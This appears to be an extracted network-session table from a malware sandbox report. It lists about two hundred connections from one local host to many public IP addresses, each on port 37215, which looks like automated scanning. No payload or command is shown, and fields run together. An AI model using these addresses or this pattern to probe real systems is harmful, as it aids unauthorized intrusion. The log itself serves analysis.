                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17247192.168.2.1342948157.97.134.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17248192.168.2.133946641.228.100.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17249192.168.2.135912259.71.64.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17250192.168.2.1337532197.226.78.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17251192.168.2.1339838197.235.15.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17252192.168.2.1357906157.222.188.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17253192.168.2.1333554197.200.24.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17254192.168.2.1357694157.253.240.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17255192.168.2.1359126157.166.172.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17256192.168.2.1341016157.195.188.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17257192.168.2.1334138197.127.77.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17258192.168.2.134521641.248.223.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17259192.168.2.1352068197.44.29.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17260192.168.2.1349704197.117.192.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17261192.168.2.1346974197.209.128.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17262192.168.2.1346968132.199.108.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17263192.168.2.1358292157.73.129.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17264192.168.2.134862841.21.125.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17265192.168.2.1359292157.190.41.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17266192.168.2.1345244197.28.248.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17267192.168.2.1340134157.192.80.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17268192.168.2.1345840197.214.196.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17269192.168.2.1360508106.137.135.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17270192.168.2.134912641.68.200.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17271192.168.2.133292441.63.181.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17272192.168.2.1336852192.120.3.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17273192.168.2.135993041.2.164.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17274192.168.2.1353254157.104.172.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17275192.168.2.136079441.88.7.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17276192.168.2.1346706157.22.126.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17277192.168.2.1333902106.36.242.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17278192.168.2.134887641.43.59.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17279192.168.2.1356252157.192.45.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17280192.168.2.135737619.35.172.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17281192.168.2.1358916197.255.229.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17282192.168.2.1351410197.229.2.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17283192.168.2.134878841.29.43.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17284192.168.2.1347038157.35.41.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17285192.168.2.1339540197.154.49.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17286192.168.2.133633841.31.212.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17287192.168.2.133568241.88.91.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17288192.168.2.1348972197.44.20.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17289192.168.2.1341240148.203.64.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17290192.168.2.1357776204.134.187.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17291192.168.2.1355398180.247.193.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17292192.168.2.1355112197.16.14.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17293192.168.2.134293436.73.132.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17294192.168.2.135776641.248.235.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17295192.168.2.133637641.188.130.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17296192.168.2.134520462.105.33.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17297192.168.2.1336374177.113.197.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17298192.168.2.1352300157.57.154.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17299192.168.2.1357986197.191.108.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17300192.168.2.135872261.69.207.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17301192.168.2.134274441.221.114.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17302192.168.2.1349648197.9.254.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17303192.168.2.1336330163.70.207.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17304192.168.2.1357688157.209.255.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17305192.168.2.1353698157.215.28.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17306192.168.2.135048441.186.175.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17307192.168.2.133485441.88.136.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17308192.168.2.1353658197.102.74.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17309192.168.2.1339592157.81.207.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17310192.168.2.1345474157.198.149.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17311192.168.2.1339152197.52.222.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17312192.168.2.133330441.85.99.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17313192.168.2.133618041.45.7.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17314192.168.2.133555641.203.106.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17315192.168.2.133948435.57.87.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17316192.168.2.1351548197.30.229.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17317192.168.2.1342526157.90.16.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17318192.168.2.133877041.26.80.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17319192.168.2.134001885.114.72.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17320192.168.2.1355868197.83.172.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17321192.168.2.135796041.102.213.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17322192.168.2.133994841.56.251.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17323192.168.2.1334310197.57.131.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17324192.168.2.135689441.96.139.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17325192.168.2.1336924157.105.79.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17326192.168.2.135012459.46.193.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17327192.168.2.1357056197.44.204.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17328192.168.2.1359156209.201.113.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17329192.168.2.1337546185.41.126.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17330192.168.2.136050241.197.9.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17331192.168.2.1345290197.84.69.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17332192.168.2.133709041.24.125.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17333192.168.2.1341580157.127.198.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17334192.168.2.1359820157.156.235.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17335192.168.2.135345641.207.206.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17336192.168.2.1359964197.10.175.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17337192.168.2.1344948157.202.16.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17338192.168.2.135212041.90.167.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17339192.168.2.134946641.196.0.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17340192.168.2.1345100157.99.98.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17341192.168.2.1349150197.199.151.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17342192.168.2.135540041.49.118.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17343192.168.2.1353490131.185.167.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17344192.168.2.1334898157.154.219.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17345192.168.2.1357296197.217.9.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17346192.168.2.135532241.147.47.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17347192.168.2.1336390197.118.211.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17348192.168.2.1344852197.205.195.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17349192.168.2.1355888157.234.124.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17350192.168.2.1343350157.76.217.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17351192.168.2.1359980197.227.193.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17352192.168.2.135429041.108.185.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17353192.168.2.134463644.65.211.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17354192.168.2.1338764157.120.231.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17355192.168.2.1336372157.161.89.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17356192.168.2.1343620113.226.78.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17357192.168.2.134854640.146.43.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17358192.168.2.1338972197.45.218.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17359192.168.2.1339274157.231.7.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17360192.168.2.1339714186.102.188.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17361192.168.2.135833297.243.250.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17362192.168.2.1347674143.86.196.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17363192.168.2.134991641.61.188.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17364192.168.2.1342770157.10.118.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17365192.168.2.1359828157.165.172.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17366192.168.2.1354828197.91.97.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17367192.168.2.133774641.0.46.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17368192.168.2.1352240157.210.142.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17369192.168.2.134915041.167.127.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17370192.168.2.1340868197.140.73.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17371192.168.2.1337776202.122.117.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17372192.168.2.1347262197.232.205.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17373192.168.2.1357166157.242.231.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17374192.168.2.1353394157.16.72.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17375192.168.2.1338410157.122.108.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17376192.168.2.133672475.152.30.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17377192.168.2.1340702157.1.146.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17378192.168.2.1347298157.95.45.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17379192.168.2.1336316136.28.51.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17380192.168.2.133674041.181.111.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17381192.168.2.136059841.115.34.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17382192.168.2.1336538200.135.131.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17383192.168.2.1356502190.62.241.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17384192.168.2.1347946197.56.197.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17385192.168.2.1334814197.209.204.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17386192.168.2.135874241.181.222.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17387192.168.2.1342210197.60.216.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17388192.168.2.135866441.57.82.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17389192.168.2.133532441.240.86.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17390192.168.2.1339536197.35.98.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17391192.168.2.134480258.201.254.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17392192.168.2.1336022121.119.168.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17393192.168.2.134319631.13.228.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17394192.168.2.1344262157.189.196.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17395192.168.2.1357510157.254.72.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17396192.168.2.1337102157.151.90.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17397192.168.2.134130841.12.119.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17398192.168.2.135653441.133.46.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17399192.168.2.134019841.123.174.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17400192.168.2.1345194197.200.161.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17401192.168.2.1357968157.78.52.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17402192.168.2.135283241.219.22.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17403192.168.2.1350790197.241.37.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17404192.168.2.1343198157.99.197.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17405192.168.2.1346900175.53.21.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17406192.168.2.1344614197.190.152.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17407192.168.2.1343874169.36.5.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17408192.168.2.1352342197.130.197.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17409192.168.2.1346232197.27.215.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17410192.168.2.1348744157.127.112.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17411192.168.2.136062641.173.121.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17412192.168.2.1347138157.251.107.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17413192.168.2.1335114157.219.61.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17414192.168.2.1360354190.138.6.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17415192.168.2.1339978157.226.46.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17416192.168.2.1343320157.37.88.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17417192.168.2.1336662197.20.110.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17418192.168.2.135841041.90.115.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17419192.168.2.1340284197.105.101.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17420192.168.2.1351364197.139.93.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17421192.168.2.1354286141.129.145.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17422192.168.2.1343394197.233.203.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17423192.168.2.13498581.138.137.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17424192.168.2.1352082197.152.205.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17425192.168.2.1353246128.35.151.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17426192.168.2.135203641.126.11.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17427192.168.2.1349916197.216.136.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17428192.168.2.134979071.163.50.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17429192.168.2.1353574114.200.25.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17430192.168.2.1345030197.243.124.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17431192.168.2.1358334197.181.162.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17432192.168.2.1359348157.174.234.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17433192.168.2.134535641.222.204.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17434192.168.2.134558481.147.73.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17435192.168.2.1355936222.124.27.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17436192.168.2.1338180157.11.245.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17437192.168.2.1344404117.194.77.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17438192.168.2.1352974181.2.95.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17439192.168.2.136014247.189.178.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17440192.168.2.1340902157.100.175.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17441192.168.2.1349038157.164.230.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17442192.168.2.134088041.136.103.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17443192.168.2.1359364157.60.151.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17444192.168.2.1356214157.148.169.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17445192.168.2.1342606197.94.14.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17446192.168.2.1346632177.108.219.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17447192.168.2.1342336157.104.159.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17448192.168.2.1344172157.120.197.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17449192.168.2.1350982157.2.179.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17450192.168.2.134887463.153.61.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17451192.168.2.135851863.106.220.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17452192.168.2.1335670157.142.43.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17453192.168.2.1355686157.239.236.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17454192.168.2.1352238157.92.146.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17455192.168.2.1350188157.172.181.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
